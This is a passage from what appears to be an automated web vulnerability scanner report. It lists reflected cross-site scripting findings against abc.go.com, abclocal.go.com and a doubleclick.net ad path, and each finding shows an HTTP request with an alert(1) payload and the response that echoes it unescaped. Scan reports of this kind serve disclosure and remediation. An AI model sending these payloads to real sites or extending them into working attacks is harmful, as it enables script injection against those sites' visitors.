GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.pngadd94"-alert(1)-"da4ce7e27d2&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:21 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc02
Cache-Expires: Wed, 23 Feb 2011 23:12:20 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
mb');
   crumbs.set({"breadcrumbDiv": "breadcrumb", "showTitle": "","currentPageType":"Featured", "currentPageUrl":"/watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.pngadd94"-alert(1)-"da4ce7e27d2&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=&brandid=001","cookieName" : "abc_v
...[SNIP]...

3.30. http://abc.go.com/watch [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeaf7"-alert(1)-"bf408a71e3b was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1eeaf7"-alert(1)-"bf408a71e3b&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:10 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc02
Cache-Expires: Wed, 23 Feb 2011 23:12:10 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
vascript">
   var crumbs = new abcdm.abc.vp2.ui.breadcrumb.Breadcrumb('breadcrumb');
   crumbs.set({"breadcrumbDiv": "breadcrumb", "showTitle": "","currentPageType":"Featured", "currentPageUrl":"/watch?i=1eeaf7"-alert(1)-"bf408a71e3b&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3
...[SNIP]...

3.31. http://abc.go.com/watch [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the i request parameter is copied into an HTML comment. The payload bd0a6--><script>alert(1)</script>1c4bcbbcc0b was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1bd0a6--><script>alert(1)</script>1c4bcbbcc0b&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:12 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:12 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 6.0.3.9_10_1 ~~~ Brandid: 001 ~~~ /watch?i=1bd0a6--><script>alert(1)</script>1c4bcbbcc0b&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3
...[SNIP]...

3.32. http://abc.go.com/watch [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 79066--><script>alert(1)</script>bceb9d2f1a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?79066--><script>alert(1)</script>bceb9d2f1a4=1 HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:08 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:07 GMT
Content-Length: 15676
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 6.0.3.9_10_1 ~~~ Brandid: 001 ~~~ /watch?79066--><script>alert(1)</script>bceb9d2f1a4=1&brandid=001 -->
...[SNIP]...

3.33. http://abc.go.com/watch [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22c78"-alert(1)-"857dd371022 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?22c78"-alert(1)-"857dd371022=1 HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:06 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc02
Cache-Expires: Wed, 23 Feb 2011 23:12:06 GMT
Content-Length: 15628
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
/javascript">
   var crumbs = new abcdm.abc.vp2.ui.breadcrumb.Breadcrumb('breadcrumb');
   crumbs.set({"breadcrumbDiv": "breadcrumb", "showTitle": "","currentPageType":"Featured", "currentPageUrl":"/watch?22c78"-alert(1)-"857dd371022=1&brandid=001","cookieName" : "abc_vp_breadcrumb" });
</script>
...[SNIP]...

3.34. http://abc.go.com/watch [partner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the partner request parameter is copied into an HTML comment. The payload fce41--><script>alert(1)</script>a0f23fb5a53 was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=fce41--><script>alert(1)</script>a0f23fb5a53&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:32 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
Cache-Expires: Wed, 23 Feb 2011 23:12:32 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
c.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=fce41--><script>alert(1)</script>a0f23fb5a53&pc=&pl=&brandid=001 -->
...[SNIP]...

3.35. http://abc.go.com/watch [partner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbab2"-alert(1)-"8115564337a was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=dbab2"-alert(1)-"8115564337a&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:30 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:30 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
c.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=dbab2"-alert(1)-"8115564337a&pc=&pl=&brandid=001","cookieName" : "abc_vp_breadcrumb" });
</script>
...[SNIP]...

3.36. http://abc.go.com/watch [pc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the pc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cafe5"-alert(1)-"bce35d84227 was submitted in the pc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=cafe5"-alert(1)-"bce35d84227&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:36 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc02
Cache-Expires: Wed, 23 Feb 2011 23:12:36 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
m/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=cafe5"-alert(1)-"bce35d84227&pl=&brandid=001","cookieName" : "abc_vp_breadcrumb" });
</script>
...[SNIP]...

3.37. http://abc.go.com/watch [pc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the pc request parameter is copied into an HTML comment. The payload c68cf--><script>alert(1)</script>95f6c7f6244 was submitted in the pc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=c68cf--><script>alert(1)</script>95f6c7f6244&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:37 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
Cache-Expires: Wed, 23 Feb 2011 23:12:37 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
m/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=c68cf--><script>alert(1)</script>95f6c7f6244&pl=&brandid=001 -->
...[SNIP]...

3.38. http://abc.go.com/watch [pl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the pl request parameter is copied into an HTML comment. The payload ab41d--><script>alert(1)</script>4b90f52be3c was submitted in the pl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=ab41d--><script>alert(1)</script>4b90f52be3c HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:42 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:42 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=ab41d--><script>alert(1)</script>4b90f52be3c&brandid=001 -->
...[SNIP]...

3.39. http://abc.go.com/watch [pl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the pl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38ed3"-alert(1)-"16bb995b9fc was submitted in the pl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=38ed3"-alert(1)-"16bb995b9fc HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:41 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
Cache-Expires: Wed, 23 Feb 2011 23:12:40 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=38ed3"-alert(1)-"16bb995b9fc&brandid=001","cookieName" : "abc_vp_breadcrumb" });
</script>
...[SNIP]...

3.40. http://abclocal.go.com/wls/story [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abclocal.go.com
Path:   /wls/story

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc0d5'%3balert(1)//06cec9ccd55 was submitted in the section parameter. This input was echoed as bc0d5';alert(1)//06cec9ccd55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wls/story?section=news/politicsbc0d5'%3balert(1)//06cec9ccd55&id=7977364&rss=rss-espnChicago-wls-article-7977364 HTTP/1.1
Host: abclocal.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Date: Sat, 26 Feb 2011 01:50:29 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 01:50:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc06
X-Powered-By: ASP.NET
Set-Cookie: SWID=A0C858BF-04E3-46C4-8DF4-ACF76E3CCD6D; path=/; expires=Sat, 26-Feb-2031 01:50:29 GMT; domain=.go.com;
Cache-Expires: Sat, 26 Feb 2011 01:53:29 GMT
Content-Length: 75131
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="e
...[SNIP]...
<a href="http://abclocal.go.com/wls/html5/video?id=7978923&pid=7977364&section=news/politicsbc0d5';alert(1)//06cec9ccd55">
...[SNIP]...

3.41. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eca1a"-alert(1)-"9f45c7913ea was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=eca1a"-alert(1)-"9f45c7913ea HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8444
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 23 Feb 2011 21:38:14 GMT
Expires: Wed, 23 Feb 2011 21:38:14 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
